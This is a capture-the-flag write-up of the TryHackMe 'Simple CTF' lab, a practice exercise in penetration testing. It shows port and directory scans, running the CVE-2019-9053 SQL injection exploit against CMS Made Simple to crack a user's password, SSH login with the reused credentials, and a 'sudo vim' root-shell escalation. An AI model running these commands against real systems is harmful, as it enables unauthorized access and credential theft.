Room: https://tryhackme.com/room/easyctf
The past few days, I have been learning the actual details of cybersecurity from the All-In-One CompTIA PenTest+ Exam Guide by Ray Nutting.
Today we tackle the Simple CTF room and hopefully some of the concepts from the book will help me here again.
Enumeration
Port Scan
Always good to start a nmap scan: nmap -v -A 10.10.147.64
. This nets us 3 ports:
- 21/tcp – ftp – vsftpd 3.0.3
- Anonymous FTP Login allowed
- 80/tcp – http – Apache httpd 2.4.18 ((Ubuntu))
- 2222/tcp- ssh – OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Web Scan
We know that we have a web server on port 80, it just shows the default apache 2 Ubuntu page, we can run gobuster to find any useful information on the webserver
gobuster dir -u 10.10.147.64 -w /usr/share/wordlists/dirb/common.txt
===============================================================
2021/03/29 16:16:15 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2021/03/29 16:16:18 Finished
===============================================================
The robots.txt and /simple, are interesting so let’s check them out in the browser.
In the robots.txt, it specifically specifies: Disallow: /openemr-5_0_1_3
. Trying to navigate to this directory returns a not found error.
Navigating to /simple gives us a website powered by CMS Made Simple version 2.2.8
Vulnerability Search
First, let’s start with the application that we know is running, CMS Made Simple version 2.2.8:
searchsploit cms made simple 2.2.8
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
---------------------------------------------- ---------------------------------
We get a hit! Navigating to this exploit in the browser, we see CVE-2019-9053 and we get a python script for cracking passwords. I copied the text into sublime editor, and saved it as ~/cve.py
.
Now we just need to activate the script
python2 cve.py -u http://10.10.147.64/simple --crack -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]
[+] Password found: 0c01f4468bd75d7a84c7eb73846e----
[+] Password cracked: <redacted>
Gaining Access
With one account pulled from the DB, we can try to see if this user is using the same credentials for multiple services, such as ssh: ssh [email protected] -p2222
, and he is! We have access now, so let’s look around.
- We see a user.txt file in mitch’s home directory, we can
cat
that for a flag cd ..
reveals another user, sunbathsudo -l
reveals we have permission to runvim
with no password- This is our entry point for PrivEsc, we can browse GTFOBins for syntax.
PrivEsc
Searching vim on GTFOBins nets this command for a root shell:
sudo vim -c ':!/bin/sh'
Now with our shell as root, which we can verify by running whoami
, we can cd /root
and cat
the root.txt
file in the directory!
Comments
No comments available.